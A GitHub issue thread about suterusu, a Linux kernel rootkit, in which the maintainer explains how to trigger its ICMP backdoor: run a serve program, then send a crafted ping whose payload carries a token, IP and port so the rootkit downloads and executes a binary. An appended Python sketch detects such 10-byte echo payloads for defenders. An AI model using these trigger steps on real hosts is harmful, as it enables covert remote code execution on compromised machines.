mncoppola / suterusu

An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
MIT License

How to use ICMP modules #8

Closed isafe closed 9 years ago

isafe commented 9 years ago

Hello: How to use ICMP modules? I compile ICMP modules, but I don't know how to use it.

mncoppola commented 9 years ago

Hi, if I remember correctly there are two steps:

  1. Compile and run ./serve (./serve [port] [binary])
  2. ping 1.2.3.4 -p [hex AUTH_TOKEN][hex your IP address][hex port number] -s 10

Suterusu is basically casting the payload of the ICMP packet to https://github.com/mncoppola/suterusu/blob/master/icmp.c#L9 and checking against that. It also verifies the payload is 10 bytes large, i.e. AUTH_TOKEN=4, IP address=4, port number=2.

Then Suterusu should receive the ICMP packet, detect that it's a special packet, and download + execute the binary. If you're having issues getting it to trigger, I'd recommend turning on debugging and watching dmesg.

isafe commented 9 years ago

I got it, thank you!
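For detection, the 10-byte payload described in the thread is a usable network signal, since common ping defaults send 56 bytes (Linux) or 32 bytes (Windows). The sketch below is an added example, not part of the original thread or the project's code: it flags ICMP echo requests whose payload is exactly 10 bytes and decodes the fields for triage. The field order follows the ping pattern quoted above; network byte order for the address and port, the token value, and all sample bytes are assumptions constructed for illustration.

```python
import ipaddress
import struct

ICMP_ECHO_REQUEST = 8
TRIGGER_PAYLOAD_LEN = 10  # 4-byte token + 4-byte IP + 2-byte port, per the thread
ECHO_HDR = "0800000012340001"  # constructed: type 8, code 0, checksum 0, id, seq


def inspect_icmp(icmp: bytes):
    """Return a finding dict for a suspicious echo request, else None.

    `icmp` is the raw ICMP message: 8-byte header followed by the payload.
    """
    if len(icmp) < 8:
        return None  # truncated header, nothing to classify
    icmp_type, code = icmp[0], icmp[1]
    payload = icmp[8:]
    if icmp_type != ICMP_ECHO_REQUEST or code != 0:
        return None
    if len(payload) != TRIGGER_PAYLOAD_LEN:
        return None
    # Assumption: address and port are carried in network byte order.
    token, raw_ip, port = struct.unpack("!4s4sH", payload)
    return {
        "token_hex": token.hex(),
        "callback_ip": str(ipaddress.IPv4Address(raw_ip)),
        "callback_port": port,
    }


# Constructed samples: placeholder token aabbccdd, 192.0.2.5 (TEST-NET-1), port 4444.
SAMPLES = {
    "10-byte payload": bytes.fromhex(ECHO_HDR + "aabbccdd" + "c0000205" + "115c"),
    "default 56-byte ping": bytes.fromhex(ECHO_HDR) + bytes(56),
    "echo reply, 10 bytes": bytes.fromhex("0000000012340001") + bytes(10),
}


def scan(samples):
    """Map each sample name to its finding (None when the packet is not flagged)."""
    return {name: inspect_icmp(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, finding in scan(SAMPLES).items():
        print(f"{name}: {finding or 'ok'}")
```

A 10-byte echo payload is a heuristic rather than proof, so treat a hit as a reason to check the host for outbound connections to the decoded address and port.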